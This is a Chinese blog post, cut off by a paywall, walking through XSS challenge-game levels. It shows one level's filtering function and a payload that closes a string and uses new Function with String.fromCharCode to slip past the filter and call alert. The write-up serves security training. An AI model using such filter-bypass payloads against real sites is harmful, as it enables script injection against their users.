【漏洞挖掘】——30、XSS闯关游戏录(下)

FLy_鹏程万里

已于 2024-06-05 12:17:51 修改

阅读量2.8w

点赞数

CC 4.0 BY-SA版权

分类专栏：【WEB渗透】文章标签： xss 渗透测试信息安全网络安全

于 2018-03-22 18:27:10 首次发布

本文链接：https://blog.youkuaiyun.com/Fly_hps/article/details/79657964

【WEB渗透】专栏收录该内容

214 篇文章 ¥99.90 ¥299.90

订阅专栏

本文详细解析了一系列XSS闯关游戏，包括利用单引号闭合语句、双引号绕过过滤、正则编码绕过、匿名函数与属性利用等技巧，逐步揭秘XSS漏洞挖掘的方法。

Well

题目源码

function escape(s) {
  http://www.avlidienbrunn.se/xsschallenge/

  s = s.replace(/[\r\n\u2028\u2029\\;,()\[\]<]/g, '');
  return "<script> var email = '" + s + "'; <\/script>";
}

源码分析

代码过滤了\r、\n、\u2028、\u2029、\、;、,、(、)、[、]和<。单引号没被过滤，可以闭合前面的语句，通过定义函数来执行代码，在Payload中我们借助了new Function语法

解题过程

payload：

'+new Function `a${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`+'

No

题目源码

// submitted by Stephen Leppik

function e

了解本专栏

订阅专栏解锁全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

【漏洞挖掘】——29、XSS闯关游戏录(上)

Fly_鹏程万里

03-22

2121

alf.nu/alert1是一个XSS训练平台，集结了一些常见的XSS漏洞利用场景，总共有29道题目。

漏洞复现篇——XSS靶场小游戏

爱国小白帽

02-25

4477

实验环境： PHPstudy xss闯关小游戏火狐浏览器

2 条评论您还未登录，请先登录后发表或查看评论

2 条评论

优快云-Ada助手 2024.06.06
哇, 你的文章质量真不错，值得学习！不过这么高质量的文章, 还值得进一步提升, 以下的改进点你可以参考下: (1)增加条理清晰的目录；(2)提升标题与正文的相关性。

优快云-Ada助手 2024.06.06
哇, 你的文章质量真不错，值得学习！不过这么高质量的文章, 还值得进一步提升, 以下的改进点你可以参考下: (1)提升标题与正文的相关性；(2)增加条理清晰的目录。

网络安全——文件上传

W981113的博客

01-01

2609

1.文件动态文件：具有交互性的文件格式：.py .php 等与代码相关的文件，与后台进行交互静态文件：不具有交互性的文件格式：.jpg .txt .mp3（二进制流通过播放器所呈现的效果）.html（将二进制流发送至用户端，浏览器对页面信息进行解析）当静态文件当成动态文件同样会被执行，某些漏洞也会导致静态文件被执行漏洞—动态文件：上传、找到路径调用 —静态文件：上传、找到路径、利用可执行的漏洞进行调用 2.文件上传漏洞概述我们在上网时经常会使用文件上传的功能，比如上传一个头

上传文件的客户端检测（仅限于图片）

dingbiebin1233的博客

04-11

215

较大的文件的检测是比较棘手的，大文件在服务器端验证的话基本是不可行的，因为在验证是在文件上传结束才可以进行的，事实上，不作特殊处理大文件不可能完成上传的，IIS将会直接抛出异常，此异常你的程序是获取不到的。详见http://blog.joycode.com/saucer/archive/2004/03/16/16225.aspx 对于图片的文件大小限制可以如下处理：<!DOCTY...

文件上传 01 客户端检测绕过(javascript 检测)

kevinhanser

08-12

2247

本文记录文件上传学习过程，教程为《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...

文件上传漏洞常见客户端与服务端检测绕过

bwxzdjn的博客

04-23

4738

客户端和服务端的文件上传的检测和绕过方法，通过一些实验案例了解文件上传漏洞的危害和一些常见类型，理解文件上传的利用条件。

文件上传漏洞绕过手段

18年3月萌新白帽子

06-12

1万+

文件上传漏洞的成因：1.服务器的错误配置2.开源编码器漏洞3.本地上传上限制不严格被绕过4.服务器端过滤不严格被绕过常见上传检测流程2.文件上传漏洞的危害（1）网站被控制（2）服务器沦陷（3）同服务器的其他网站沦陷3.客户端验证检测可以看到客户端代码中使用了javascript语言进行了简单的文件后缀名判断这个时候我们只需要将本机浏览器的javascript模块禁用就可以使该段代码不被解析执行。在...

xss闯关小游戏.zip

02-25

这是一款利用xss漏洞闯关的小游戏，无需连接数据库，共20关，非常适合网络安全攻防的初学者练习使用，使用及安装教程请看此链接，https://editor.youkuaiyun.com/md?articleId=104496122 欢迎各位小伙伴下载

1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md

08-10

一些关于xss的payload

文件上传的一些绕过方法

cherrie007的博客

07-13

4189

0x01: 前台脚本检测扩展名—绕过原理当用户在客户端选择文件点击上传的时候，客户端还没有向服务器发送任何消息，就对本地文件进行检测来判断是否是可以上传的类型，这种方式称为前台脚本检测扩展名。绕过方法绕过前台脚本检测扩展名，就是将所要上传文件的扩展名更改为符合脚本检测规则的扩展名，通过BurpSuite工具，截取数据包，并将数据包中文件扩展名更改回原来

那些方法可以绕过服务器对文件内容的检测,文件上传漏洞

weixin_34739646的博客

08-13

2887

文件上传文件上传就是在一些web应用中允许用户上传图片，文本等相应文件到服务器指定的位置。而文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中，之后通过url去访问以执行代码达到攻击的目的。可以成功攻击的条件1.存放上传文件的目录要有执行脚本的权限，也就是文件能够被解析执行。2.可以通过web访问这个文件。3.知道文件上传后的路径和文件名称，有的web应用会修改上传文件的文件名称。上传...

文件上传攻防解析

zuimei_forver的博客

03-12

1005

文件上传是WEB应用很常见的一种功能，本身是一项正常的业务需求，不存在什么问题。但如果在上传时没有对文件进行正确处理，则很可能会发生安全问题。本文将对文件上传的检测方式以及如何绕过相应检测方式进行详细的分析，并提供针了对文件上传攻击的安全防护方法。

文件上传漏洞前5题详解

2302_78194947的博客

07-17

1129

文件上传漏洞

文件上传漏洞及绕过检测的方式

seek_2022的博客

05-07

1万+

文章目录一、什么是文件上传漏洞？二、目标会对文件上传做哪些防护？（一）客户端检测（二）服务端检测（三）白名单和黑名单的区别三、绕过后端黑名单检测（一）换一个后缀名绕过黑名单检测（二）用.htaccess文件巧妙绕过黑名单（三）用大小写绕过后缀名检测（四）文件后缀加空格或点绕过后缀名检测（五）构造文件后缀绕过后缀名检测（六）双写绕过后缀名检测（七）Windows文件流绕过后缀名检测四、绕过白名单检测（一）%00截断和00截断（二）绕过Content-Type检测（三）用图片木马绕过白名单检测（四）用gif文件

WEB漏洞攻防 - 文件上传漏洞 -常规检测之客户端验证绕过

易编橙 · 终身成长社群，相遇已是上上签！

08-05

1134

客户端验证绕过,也称为本地JS验证其验证原理是通过前端的JavaScript脚本本地验证上传文件的后缀名，当检测出为不符上传格式的文件时进行本地拦截。

文件上传漏洞原理和绕过方式

Andrew的博客

03-22

6673

一.文件上传漏洞原理网站Web应用都有一些文件上传功能，比如文档、图片、头像、视频上传，当上传功能的实现代码没有严格校验上传文件的后缀和文件类型，此时攻击者就可以上传一个webshell到一个Web可访问的目录上，并将恶意文件传递给如PHP解释器去执行，之后就可以在服务器上执行恶意代码，进行数据库执行、服务器文件管理，服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破...

解析漏洞讲解、filepath、content-type绕过检测上传文件

qq_38135094的博客

04-10

9982

文件上传漏洞是指上传了一个可执行的脚本文件，从而获得执行服务器相关的权限和指令。如何上传文件，有很多种方法，而上传需要注意的形式也有很多。要完成这个攻击，要满足以下几个条件: 首先，上传的文件能够被Web容器解释执行。所以文件上传后所在的目录要是Web容器所覆盖到的路径。其次，用户能够从Web上访问这个文件。如果文件上传了，但用户无法通过Web访问，或者无法得到Web容器

php前端后缀名绕过,有关上传webshell文件绕过的总结

weixin_39911916的博客

03-28

1429

2017-08-15下午碰到一个站，有两处上传漏洞，通过一个点获取了webshell，尝试另一个点获取shell，还使用了白盒测试，然而并没有绕过。总结一下，碰到文件上传的好事，应该如何绕过后缀名1. 前台脚本检测扩展名由于是客户端脚本的检测，任何的逻辑都可以通过burpsuit抓包，直接更改报文内容，替换文件扩展名2. Content-Type检测文件类型-绕过Content-Type检测是对h...

文件上传验证绕过技术总结

最新发布

08-01

### HONOR 20 手机参数配置功能 HONOR 20 是荣耀品牌在2019年推出的一款中高端智能手机，主打性价比和拍照功能。以下是关于 HONOR 20 的详细参数和功能介绍： #### 核心配置 HONOR 20 搭载了华为自研的麒麟 810 处理器，采用先进的 7nm 制程工艺，具备出色的性能和能效表现。该处理器在当时属于中高端定位，能够流畅运行主流应用和游戏[^3]。 - **内存与存储**：HONOR 20 提供多个版本供用户选择，包括 6GB+128GB、8GB+128GB 和 8GB+256GB，支持通过 microSD 卡扩展存储空间[^3]。 - **电池与充电**：内置 4000mAh 大容量电池，支持 20W 快充技术，能够在短时间内快速充电，满足日常使用需求[^3]。 #### 屏幕与外观设计 HONOR 20 采用了一块 6.26 英寸的 LCD 水滴屏，分辨率为 2340×1080 像素，屏占比高达 91.5%，整体视觉效果较为出色。机身采用玻璃背板设计，提供多种时尚配色，包括幻影蓝、幻夜黑和冰岛白等[^3]。 #### 摄像头功能 HONOR 20 在拍照方面表现出色，后置四摄组合，具体配置如下： - **主摄**：4800 万像素，f/1.8 光圈，支持自动对焦 - **超广角镜头**：800 万像素，f/2.4 光圈 - **微距镜头**：200 万像素，f/2.4 光圈 - **景深镜头**：200 万像素，f/2.4 光圈前置摄像头为 3200 万像素，f/2.0 光圈，支持 AI 美颜、人脸识别等功能，满足用户自拍需求[^3]。 #### 网络与连接 HONOR 20 支持双卡双待，兼容 4G LTE 网络，同时配备 Wi-Fi、蓝牙 5.0、GPS、NFC 等常用连接功能，提升用户的使用体验[^3]。 #### 操作系统与软件功能 HONOR 20 出厂搭载基于 Android 9.0 深度定制的 Magic UI 2.1 系统，提供丰富的智能功能，如语音助手、手势操作、智能分屏等，提升用户的操作效率[^3]。 #### 其他特色功能 - **散热系统**：采用石墨烯散热技术，有效降低手机在高负载下的温度，提升游戏体验。 - **音频体验**：支持 3.5mm 耳机接口，保留传统音频输出方式，方便用户使用有线耳机。 ### 总结 HONOR 20 凭借其出色的性价比、优秀的拍照能力和稳定的性能表现，在当时获得了不少用户的青睐。无论是日常使用还是拍照记录，HONOR 20 都能够满足大部分用户的需求。 ```java // 示例代码：获取设备基本信息（如需在 Android 应用中获取设备信息） import android.os.Build; import android.util.Log; public class DeviceInfo { public static void logDeviceInfo() { Log.d("DeviceInfo", "Model: " + Build.MODEL); Log.d("DeviceInfo", "Manufacturer: " + Build.MANUFACTURER); Log.d("DeviceInfo", "Android Version: " + Build.VERSION.RELEASE); Log.d("DeviceInfo", "SDK Version: " + Build.VERSION.SDK_INT); } } ```